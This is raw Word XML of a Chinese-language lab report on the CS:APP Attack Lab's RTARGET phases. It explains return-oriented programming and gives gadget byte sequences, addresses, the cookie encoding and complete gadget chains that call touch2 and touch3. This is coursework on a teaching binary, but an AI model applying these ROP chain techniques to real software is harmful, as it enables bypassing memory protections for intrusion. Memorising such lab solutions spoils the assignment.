                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>第二部分：</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对程序RTARGET执行代码注入攻击要比对CTARGET执行代码注入攻击困难得多，因为它使用两种技术来阻止这种攻击:它使用随机化，以便每次运行时堆栈位置不同。这使得我们无法确定注入代码的位置。它将保存堆栈的内存部分标记为不可执行，因此即使我们可以将程序计数器设置为注入代码的开始，程序也会因分段错误而失败。幸运的是，聪明的人已经设计出一些策略，通过执行现有代码而不是注入新代码来完成程序中有用的事情。最一般的形式被称为面向回报的规划(ROP)[1,2]。ROP的策略是在现有程序中识别由一条或多条指令后面跟着指令ret组成的字节序列。这样的段称为小部件。也就是说，第二部分我们无法直接注入我们的代码，所以我们需要通过寻找farm文件中的小工具，根据它们的机器码拼接成我们所需要的代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6187440" cy="2026920"/>
            <wp:effectExtent l="0" t="0" r="10160" b="5080"/>
            <wp:docPr id="12" name="图片 12" descr="屏幕截图 2023-11-23 21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3-11-23 210144"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6187440" cy="2026920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Level2:</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对于阶段4，我们将重复阶段2的攻击，但是在程序RTARGET上使用我们的小工具场中的小工具进行攻击。我们可以使用由以下指令类型组成的小工具构建解决方案，并且只使用前8个x86-64寄存器(%rax - %rdi)。并且我们只需要两个小工具就可以完成这一次攻击。</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要求调用touch2，也就是要求</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mov $0x4dae86d7,%rdi</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push 0x4018e5</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Ret</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可是我们并没有找到带立即数的小工具，可以采用pop %rdi再直接给%rdi赋值的方式，可是遍历搜索下没有找到%rdi，那么我们可以间接传递，先找到可以传递给%rdi的寄存器的操作mov %rax, %rdi对应 48 89 c7</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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6076315" cy="833120"/>
            <wp:effectExtent l="0" t="0" r="6985" b="508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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6076315" cy="833120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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找到相关地址为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x401abd</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 xml:space="preserve">再找pop %rax对应58 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6064250" cy="1207135"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1206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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6064250" cy="1207135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1616075</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>78740</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2015490" cy="1462405"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1079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2015490" cy="1462405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>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我们取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x401aa6</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那么顺序为</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pop %rax</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0x4dae86d7</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mov %rax, %rdi</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0x4018e5</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Level3:</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Phase5要求调用touch3，即传递cookie字符串，通过八个小组件来实现第三题的功能</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第三题汇编代码为</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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2813050" cy="1263650"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2813050" cy="1263650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Cookie : 0x4dae86d7</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寻找对应ascii码 34 64 61 65 38 36 64 37</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>00000000004019fe &lt;touch3&gt;</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可是在第二部分里面栈的地址是随机的，无法直接把cookie存进去</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那么先找找怎么把%rsp的值移出来</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查表发现所有对%rsp的操作都为48 89 **</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搜索发现</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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5835015" cy="728980"/>
            <wp:effectExtent l="0" t="0" r="6985" b="762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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5835015" cy="728980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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48 89 e0对应movq %rsp, %rax，所有第一步是把栈顶%rsp储存到%rax中，地址为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x401b5b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，我们需要根据栈顶地址和偏移量来计算cookie储存位置，在搜索48时，发现了一个特殊的小组件</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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5852160" cy="716280"/>
            <wp:effectExtent l="0" t="0" r="2540" b="762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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5852160" cy="716280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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地址为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x401ada</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，所以之后的cookie地址计算可以通过它来实现基址和偏移量一个存%rdi，一个存%rsi</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首先看看基址能否直接从%rax移到%rdi，对应48 89 c7</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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5851525" cy="692150"/>
            <wp:effectExtent l="0" t="0" r="3175" b="635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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5851525" cy="692150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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地址为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x401abd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，移到了%rdi，则基址移动完成，接下来看如何移动到%rsi。</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首先搜索各种以%rsi为终点的操作，查询失败，在farm中无该操作对应机器码，那么根据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5926455" cy="1751965"/>
            <wp:effectExtent l="0" t="0" r="4445" b="63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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5926455" cy="1751965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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查找移到%esi的操作</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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5457825" cy="749300"/>
            <wp:effectExtent l="0" t="0" r="3175" b="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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5457825" cy="749300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对应mov %ecx, %esi地址为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x401b3c</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再寻找移到%ecx的</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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5455285" cy="802640"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1016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29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5455285" cy="802640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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对应mov %edx, %ecx地址为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x401ae0</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再找移动到%edx的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5464810" cy="831850"/>
            <wp:effectExtent l="0" t="0" r="8890" b="635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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5464810" cy="831850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对应mov %eax, %edx地址为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x401b36</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寻找结束，偏移量的赋值我们可以使用pop %rax来进行赋值，然后按照</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drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>4445635</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>147955</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1943100" cy="2565400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon>
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21493"/>
                <wp:lineTo x="21459" y="21493"/>
                <wp:lineTo x="21459" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1943100" cy="2565400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Movl %eax, %edx</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Movl %edx, %ecx</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Movl %ecx, %esi</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来实现偏移量的转移</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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所以总体顺序为</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Cookie : 0x4dae86d7</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寻找对应ascii码 //为防止被当成指令，需要放到所有代码的最后</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计算偏移量：</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当执行movq %rsp, %rax时，%rsp已经往地址增大方向移动八字节了，所以此时存在%rax里面的%rsp指向的是mov %rax, %rdi语句，计算上为偏移量预留的8字节，最终cookie的偏移量为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x48</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，所以最终汇编代码逻辑如下</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 xml:space="preserve">movq %rsp, %rax  </w:t>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0x401b5b</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 xml:space="preserve">mov %rax, %rdi    </w:t>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t>0x401abd</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 xml:space="preserve">pop %rax        </w:t>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t>0x401aa6</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0x48</w:t>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t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t>48</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mov %eax,%edx</w:t>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t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x401b36</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mov %edx,%ecx</w:t>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t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x401ae0</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mov %ecx,%esi</w:t>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t>0x401b3c</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 xml:space="preserve">lea (%rdi, %rsi, 1), %rax  </w:t>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0x401ada</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mov %rax, %rdi</w:t>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t>0x401abd</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Touch3</w:t>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r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4019fe</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34 64 61 65 38 36 64 37</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
